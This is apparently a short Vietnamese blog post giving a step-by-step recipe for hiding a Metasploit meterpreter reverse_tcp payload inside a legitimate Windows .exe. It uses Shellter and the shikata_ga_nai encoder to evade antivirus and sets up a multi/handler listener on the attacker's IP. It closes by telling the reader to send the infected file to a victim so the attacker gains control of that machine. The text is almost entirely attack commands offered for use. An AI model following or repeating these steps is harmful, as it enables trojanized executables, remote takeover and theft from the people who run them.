Các bước thực hiện:
1. chuẩn bị một file thực thi .exe, để trong một thư mục hoặc
ngoài màn hình, di chuyển đến thư mục đó và làm các bước kế tiếp.
2. apt-get update
3. apt-get install shellter
4. mở metasploit bằng lệnh msfconsole.
5 use payload/windows/meterpreter/reverse_tcp
6. set LHOST là ip máy attracker
7. thích thì set luôn lport
8. show encoders để lựa chọn “ứng dụng” để thực hiện “xáo trộn”
code
9. generate –e x86/shikata_ga_nai –t raw –f met . lúc này sẽ
có 1 file có tên là met được tạo ra
10. use exploit/multi/handler
11. set PAYLOAD windows/meterpreter/reverse_tcp
12. set LHOST
13. set LPORT
14. exploit
15 di chuyển đến thư mục có chứa file exe(nếu hiện tại chưa ở
đúng vị trí) và chạy lệnh Shellter. Shellter
sẽ được mở lên dưới dạng cli
16. a
17. điền tên file mã độc .exe, quá trình sẽ tạo ra thêm file
bak và file .dll
18. met , nếu kết thúc mà báo lỗi thì quay lại bước 15 và
làm lại.
19 sau khi chạy xong, file exe đó bây giờ đã bị dính mã độc, gửi nó cho
nạn nhân, khi được thực thi ở máy nạn nhân thì quá trình khai thác ở meta thành
công.Note: sau một thời gian, các phần mềm AV đã được cập nhật, và chỉnh sửa thì sẽ nhận biết được, nên không còn giá trị hữu dụng nữa, và chúng ta nên tìm một cách khác hay hơn.
Không có nhận xét nào:
Đăng nhận xét